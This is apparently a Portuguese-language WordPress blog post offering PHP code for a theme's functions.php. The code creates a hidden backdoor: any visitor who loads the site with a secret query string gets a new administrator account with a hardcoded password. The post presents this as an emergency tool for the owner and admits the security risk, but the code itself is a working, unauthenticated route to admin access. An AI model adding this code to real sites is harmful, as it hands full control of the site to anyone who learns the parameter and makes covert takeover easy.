Backdoor para criação de novo administrador

Adicione o código abaixo no arquivo functions.php de seu tema WordPress para criar um backdoor que crie um novo usuário administrador, para ser usado em emergências.

add_action(‘wp_head’, ‘meu_backdoor’);

function meu_backdoor() {
If ($_GET[‘backdoor’] == ‘novoadmin’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘AdminNovo’)) {
$user_id = wp_create_user(‘AdminNovo’, ‘SenhaDoUsuario’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
}
}

Para ativar tal função, basta acessar o endereço https://www.meusite.com.br?backdoor=novoadmin

Logicamente, você deve alterar o usuário ‘AdminNovo’ e senha ‘SenhaDoUsuario’ na linha $user_id. Aconselho também a trocar o nome da função de ‘novoadmin’ para algo que só você saiba.

Lembre-se que usar esse código pode ser considerado um risco de segurança, qualquer um poderia facilmente executar essa função, chamando o querystring correta, por isso a necessidade de a alterar e usar parâmetros que só você saiba, como costumamos fazer com nossas senhas e dados sigilosos.

Use este código apenas para o bem, para você mesmo, ok ?

Posts Similares

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *